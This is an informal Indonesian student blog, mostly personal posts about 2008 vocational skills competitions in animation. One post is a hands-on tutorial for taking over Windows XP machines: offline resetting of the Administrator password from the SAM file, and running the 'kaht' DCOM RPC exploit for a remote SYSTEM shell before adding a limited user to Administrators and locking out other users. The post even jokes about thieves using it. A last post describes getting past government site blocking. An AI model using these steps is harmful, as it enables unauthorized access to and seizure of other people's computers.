Seneng Rasanya....

Gak terasa udah 3 hari di makassar, ughh... hari pertama dateng... agak sedikit kecewa nih... gimana gak kecewa ??? baru juga nyampe bandara.. terus naek bis... eh, kejebak macet, terus bisnya ndak ada ac nya lagi... ugh..... GILAAAA PANASSSS BANGEEETTTT....

udh 2 hari pelaksanaan lomba rasanya sedikit frustasi deh,... abis lawannya pada jago semua... terutama buat anak bali n anak kalbar... ughhhh... ndak bisa diungkapkan dengan kata2... hmmm... gpp deh walaupun pulang dengan tangan hampa, tapi banyak pengalaman yang bisa di dapet di LKS tingkat NASIONAL ini... mudah2an para pengganti saya (animator) bisa meraih prestasi terbaik di LKS NASIONAL tahun berikutnya...

LKS MAKASSAR 2008

Wadoooohhh... Dag Dih Dug Dhueeerr Daiaaaaa..!!! itu yang ada di jantung saya... gilaaa.. hari senin harus sudah berangkat... gimana nihh... tolongin saya dong,, saya harus gimana.. [ wakakakkaaka kayak perang aja... ], ehemmm... initinya saya minta dukungan dari temen2 yang kenal maupun yang ndak kenal... hehehee.. do'a kan saya yah.. mudah-mudahan saya bisa meraih juara 1 dalam bidang lomba animasi di makassar tingkat nasional... [ aminnnnnn... ]


Kemaren tgl 8 Juni 2008 kami anak2 kelas 2 pergi untuk melaksanakan lomba LLA di bukit soeharto, biarpun saya bukan anak cybergreen lagi (mantan, karena masalah pribadi)... mungkin ini adalah kegiatan kami yang terakhir di organisasi Cybergreen (Pencinta Alam) . semoga kami mampu memberikan yang terbaik buat Cybergreen dan SMKTI AIRLANGGA Samarinda.

Ndak Nyangka...


Huh... Kerja keras selama kurang lebih 2 bulan akhirnya ndak sia²... buktinya kami ber 4 yang sudah belajar hampir setiap hari di sekolah dari pagi mpe pagi lagi terbayar lunas, dengan hasil yang memuaskan kami mampu membuktikan bahwa kerja keras pasti akan membuahkan hasil,... 4 mei 2008 kami menyabet 3 emas dan 1 perak dari ajang LKS 2008 yang diadakan di balikpapan...

Saya, Danny Indra Permana (Juara 1 Animasi), Noor Rahmat (Juara 1 Software Application), Nuhajat (Juara 2 Networking Support), dan M. Riski Hajar (Juara 1 Web Design) telah mempersembahkan prestasi terbaik kami buat SMK TI AIRLANGGA, Dan kami yang telah meraih emas di tingkat porovinsi akan melanjutkan ke tingkat nasional di Kota Makasar...

Do'a kan kami semoga kami bisa memberikan yang terbaik buat Kalimantan Timur Terutama di Samarinda...

Thank's Airlangga Samarinda & Balikpapan.

LKS Tinggal 1 Minggu Lagi


Sampaiii sejauh ini persiapanku untuk menghadapi LKS 2008 di Balikpapan sepertinya sangat kurang banget... karena kemungkinan tema tahun ini adalah "Anatomi atau tingkah laku manusia dan hewan"...
Gimana ndak bingung... masalahnya aq ndak pernah memperhatikan hewan sih... apalagi "kuda dan rusa..." terpaksa setiap hari aq memperhatikan riski...(Hahahahaa...emangnya kudaaaa.... Hiiyyyykkkk Hiiiiiikkkkk....Brrrr....)

Padahal akhir² ini sudah full begadang di sekolah... sampe² jatah prakerin di CV. Arterisys di kurangin setengah bulan untuk mempersiapkan lomba di Balikpapan nanti... Tp tetep aja rasanya ndak begitu yakin,...

Buat temen² seperjuangan q... belajar yang semangat ya... Apalagi Rahmat (Software Application) anak baru nih... buat dia,,, kalo belajar yang serius dong, jangan sampe digantikan sama orang lain... mumpung dia ikut mata lomba baru, harusnya dia bisa bersaing dengan sekolah² lain... dan musti menang...!!! jangan sampe tahun ini anak airlangga ada yang jaga kampung... kita harus ke makassar ber-4...

Buat backup kami,,, belajarlah yang serius... jangan sampe kalian digantikan ade' kelas kalian di tahun depan... dan bersaing yang sehat untuk merebutkan siapa yang akan berangkat tahundepan ke LKS Kalimantan dan Nasional...

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...


---------------------
| Log On to Windows |
---------------------
| User Name : Al-k |
| Password : ***** |
---------------------
| | Ok | | Cancel | |
---------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER
---------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_______________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
_______________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1.

Selamat Mencoba...

Sebagai bentuk protes ama aksi pemerintah dengan orang IT nya yang tolol dan sok jago yang ngeblok2 sembarangan neh q kasih info cara membuka situs yang di blok buka "www.google.com/translate" terus di translate web page ketikan alamat situsnya cth "http://youtube.com" nah disebelah kanannya ada pilihan bahasa, ubah pilihan bahasa menjadi bahasa lain to english (cth : arabic to english atau chinese to english atau france to english) dan selamat menikmati kembali situs yang di blok.... Pemerintah sepertinya meng gaji orang IT yang cukup bodoh yang katanya ampe keluarin dana 18 triliun tapi tetep aja bisa ditembus lagi ama siswa yang belum lulus sekolah... Cape Dehh...